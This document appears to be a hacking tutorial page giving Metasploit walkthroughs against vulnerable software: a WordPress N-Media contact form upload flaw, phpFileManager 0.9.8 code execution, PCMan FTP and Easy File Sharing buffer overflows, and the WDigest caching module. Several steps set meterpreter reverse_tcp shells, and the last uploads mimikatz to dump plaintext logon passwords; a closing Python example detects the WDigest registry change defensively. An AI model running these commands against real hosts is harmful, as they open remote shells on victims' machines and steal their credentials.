Hack Remote PC using WordPress N-Media Website Contact Form with File Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets
WordPress N-Media Website Contact Form plugin

Requirement
Attacker: Kali Linux
Victim PC: WordPress installed


Open a Kali terminal and type msfconsole


Now type use exploit/unix/webapp/wp_nmediawebsite_file_upload
msf exploit (wp_nmediawebsite_file_upload)>set targeturi http://192.168.0.110/wordpress
msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_nmediawebsite_file_upload)>set rport 80
msf exploit (wp_nmediawebsite_file_upload)>exploit   

Hack Remote Linux PC using PHPFilemanager 0.9.8 Remote Code Execution

This module exploits a remote code execution vulnerability in phpFileManager 0.9.8, a filesystem management tool contained in a single file.

Exploit Targets
phpFileManager 0.9.8

Requirement
Attacker: Kali Linux
Victim PC: Linux


Open a Kali terminal and type msfconsole


Now type use exploit/multi/http/phpfilemanager_rce
msf exploit (phpfilemanager_rce)>set targeturi /phpfilemanager-0.9.8/index.php
msf exploit (phpfilemanager_rce)>set rhost 192.168.0.119 (IP of Remote Host)
msf exploit (phpfilemanager_rce)>exploit  

Hack Remote Windows PC using PCMAN FTP Server Buffer Overflow - PUT Command

This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credentials are enabled...

Exploit Targets
PCMAN FTP v2.0.7 Server

Requirement
Attacker: Kali Linux
Victim PC: Windows XP SP 3

Most Easy File Sharing FTP Server installations run on port 21, so to discover information about the PCMan FTP Server we run the following command:


nmap -sV 192.168.0.127


Open a Kali terminal and type msfconsole


Now type use exploit/windows/ftp/pcman_put
msf exploit (pcman_put)>set payload windows/meterpreter/reverse_tcp
msf exploit (pcman_put)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (pcman_put)>set rhost 192.168.0.127
msf exploit (pcman_put)>set rport 21
msf exploit (pcman_put)>exploit

Hack Remote Windows PC using Easy File Sharing HTTP Server 7.2 SEH Overflow

This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.

Exploit Targets
Easy File Sharing FTP Server 7.2

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Most Easy File Sharing FTP Server installations run on port 80 or 8080, so to discover information about the Easy File Sharing FTP Server we run the following command:


nmap -sV 192.168.0.103


Open a Kali terminal and type msfconsole


Now type use exploit/windows/http/easyfilesharing_seh
msf exploit (easyfilesharing_seh)>set payload windows/meterpreter/reverse_tcp
msf exploit (easyfilesharing_seh)>set lhost 192.168.0.119 (IP of Local Host)
msf exploit (easyfilesharing_seh)>set rhost 192.168.0.103
msf exploit (easyfilesharing_seh)>set rport 8080
msf exploit (easyfilesharing_seh)>exploit  


Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.

Exploit Targets
Windows 10

Requirement
Attacker: Kali Linux
Victim PC: Windows 10


Open a Kali terminal and type msfconsole


Now type use post/windows/manage/wdigest_caching
msf exploit (wdigest_caching)>set session 1
msf exploit (wdigest_caching)>exploit


To send the mimikatz file to the target system, use the following command:

upload /usr/share/mimikatz/x64/mimikatz.exe e:\\


Type the following command to check privilege

privilege::debug

Then type the following command to get users passwords in text mode.

sekurlsa::logonpasswords
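
The UseLogonCredential change described above is a single registry write, which makes it easy to monitor. The following is an added example, not part of the original walkthrough or of Metasploit: it classifies registry value-set events that touch the WDigest value. The event records are constructed samples shaped like Sysmon Event ID 13 fields, the key path is the standard WDigest location rather than a value quoted on this page, and the severity labels are this example's own.

```python
import re

# Suffix of the registry value the module changes; the hive and control-set
# prefix varies between log sources (CurrentControlSet, ControlSet001, ...).
WDIGEST_SUFFIX = r"\control\securityproviders\wdigest\uselogoncredential"
DWORD_RE = re.compile(r"DWORD \((0x[0-9a-fA-F]+)\)")

# Constructed sample records in the shape of Sysmon Event ID 13 (registry value set).
SAMPLE_EVENTS = [
    {"UtcTime": "2024-01-10 09:14:02", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostname",
     "Details": "WS01"},
    {"UtcTime": "2024-01-10 09:20:41", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"UtcTime": "2024-01-10 11:02:10", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000000)"},
]

def classify(event):
    """Return None for unrelated events, else a finding dict with a severity."""
    target = event.get("TargetObject", "").lower()
    if not target.endswith(WDIGEST_SUFFIX):
        return None
    match = DWORD_RE.search(event.get("Details", ""))
    if match is None:
        # Written with an unexpected type or unparsable data: needs manual review.
        severity, value = "review", None
    else:
        value = int(match.group(1), 16)
        # Non-zero is treated as caching switched on; zero is the hardened state.
        severity = "high" if value != 0 else "info"
    return {"time": event["UtcTime"], "image": event["Image"],
            "value": value, "severity": severity}

def scan(events):
    """Classify every event and keep only those touching the WDigest value."""
    return [f for f in map(classify, events) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A "high" finding on a Windows 8/2012 or later host, where the provider is disabled by default, means the default was overridden and the writing process in `image` is the place to start the investigation.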